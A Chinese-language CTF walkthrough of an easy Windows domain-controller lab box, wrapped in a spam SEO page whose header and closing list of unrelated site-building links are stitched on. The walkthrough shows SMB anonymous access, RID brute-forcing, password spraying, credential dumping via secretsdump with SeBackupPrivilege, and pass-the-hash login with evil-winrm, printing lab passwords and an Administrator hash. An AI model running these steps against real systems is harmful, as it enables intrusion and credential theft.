当前位置: 首页 > news >正文

经典网站首页设计秦皇岛建设里二手房

经典网站首页设计,秦皇岛建设里二手房,php 网站下载器,做外贸网站哪家公司好easy难度的windows靶机 信息收集 端口探测 nmap -sT --min-rate 10000 -p- 10.10.11.35 -oA ./port 发现开放了53,88,389等端口,推测为域控 进一步信息收集,对爆破的端口进行更加详细的扫描 小tips:对于众多的端口&…


easy难度的windows靶机

信息收集

端口探测

nmap -sT --min-rate 10000 -p- 10.10.11.35 -oA ./port

发现开放了53,88,389等端口,推测为域控
进一步信息收集,对爆破的端口进行更加详细的扫描
小tips:对于众多的端口,可以借助awk&grep处理一下便于操作

grep open port.nmap | awk -F'/' '{print $1}' | paste -sd ','
ports=$(grep open port.nmap | awk -F '/' '{print $1}' | paste -sd ',')
echo $ports

对端口进行详细扫描:

sudo nmap -sTVC -O -p$ports 10.10.11.35

看到了主域名和二级域名,先写入/etc/hosts

大致看了下信息,决定先从smb服务进行渗透,看看是否有匿名登录之类的

SMB渗透

crackmapexec smb 10.10.11.35 -u 'guest' -p ''  --shares

分别对HR和IPC$进行查看

smbclient -N //10.10.11.35/HR
smbclient -N //10.10.11.35/IPC$

在HR下发现txt,获得密码:Cicada$M6Corpb*@Lp#nZp!8

在拿到密码后,我们需要找到AD中的有效用户,便于进一步利用

有效用户枚举

通过前面nmap的扫描发现有Kerberos服务以及ldap

借助kerbrute爆破有效用户

https://github.com/ropnop/kerbrute
这个工具是利pre-authentication机制来判断用户名是否有效

./kerbrute_linux_amd64 userenum --dc 10.10.11.35 -d cicada.htb xato-net-10-million-usernames.txt

一无所获,也可能是字典的原因,我们也尝试利用LDAP服务来爆破用户名,可以借助ldapnomnom这个工具去爆破,但我们并不知道有效用户的格式,因此决定换一种方法,借助crackmapexec中的--rid-brute参数来寻找有效用户

借助crackmapexec

RID 是在 Windows 域中,每个用户账户、组账户和计算机账户都拥有的唯一标识符。一个完整的 Windows SID(Security Identifier)由多个部分组成,其中包括一个 RID,RID 用于唯一标识 Windows 域内的一个对象
当我们指定--rid-brute参数,crackmapexec会自动地尝试一系列不同的 RID 值,并通过它们来暴力破解账户密码。通常,我们可以利用该方法用于在目标机器上尝试找到有效的用户账户

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute

我们肯定是想要用户,因此使用grep过滤一下

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

最终获得一组用户保存为user_list,考虑密码喷洒

密码喷洒

crackmapexec smb 10.10.11.35 -u user_list -p 'Cicada$M6Corpb*@Lp#nZp!8'

成功获得一组凭据:michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
以这组凭据枚举一下smb服务

一个一个查看后发现并没什么可利用的,借助enum4linux来枚举一下

又发现了一组凭据:david.orelious:aRt$Lp#7t*VQ!3

在DEV下发现Backup_script.ps1,又发现了一组凭据

建立立足点

靶机开放了5985端口,手里也有三组凭据,一个一个尝试一下,最后通过emily.oscars用户建立立足点

权限提升

比较常见的一种提权方法

跟着模板打一下就行

secretsdump.py -sam sam -system system LOCAL

成功获得Administrator的hash

evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'

总结

前期通过信息收集,发现smb存在匿名登录,在'Notice from HR.txt'中发现了默认密码,然后进一步信息收集,去寻找有效用户,通过crackmapexec的--rid-brutr参数,爆破出了一组用户,然后进行密码喷洒获得一组凭据,michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8,利用这组凭据进行信息收集,利用enum4linux工具在枚举时又获得了david.orelious:aRt$Lp#7t*VQ!3,利用david用户登录smb服务,在DEV下获得ps1文件里面包含了另一组凭据,最后利用该组凭据建立立足点,借助SeBackupPrivilege完成权限提升

http://www.yayakq.cn/news/505424/

相关文章:

  • 网站开发项目经理职责湖南建设工程信息网一体化平台
  • 网站开发5人小组分工wordpress导出excel
  • 做电商网站就业岗位晋升氧气瓶网站建设
  • 有哪些做调查问卷赚钱的网站上海网站优化上
  • 网站标题栏怎么做怎么样做好网站运营
  • 哪个网站代做ppt便宜建站哪个平台好用
  • asp网站开发好怎么预览网站建设搭建公司
  • 顺的网站建设报价专业柳州网站建设推荐
  • 芜湖建设机械网站h5成品网站
  • 网站目标定位概念在线修图编辑器
  • 建设项目自主验收公示网站科技英语
  • 小说网站开发对影成三人小说搜房网房天下官网
  • 广东省网站备案短视频推广策划方案
  • 青岛营销型网站制作网站建设规划与管理 试卷
  • 网站建设 软件开发的公司传奇游戏
  • 买房子最好的网站wordpress高度还原设计稿
  • 婚介 东莞网站建设上海建筑设计工作室
  • 南昌定制网站开发网页代理地址
  • 什么叫门户网站做网站色弱可以吗
  • 中山本地网站建设推广企业直播吧在线直播
  • 外贸网站建设厦门天津有哪些互联网公司
  • 宁波快速建站公司贵州省房屋和城市建设厅官方网站
  • 营销型集团网站济南微信网站制作
  • 上虞做网站公司wordpress自适应主题
  • 安徽工业大学两学一做网站windows优化大师好不好
  • 网站的竞争对手百度seo排名优化系统
  • 营销型网站建设的特色响应式网页设计技巧
  • 兰州网站设计教程wordpress替换主题
  • 如何制作自己的公司网站电力网站建设方案
  • 全国旅游景点网站开源云南微网站建设的公司有哪些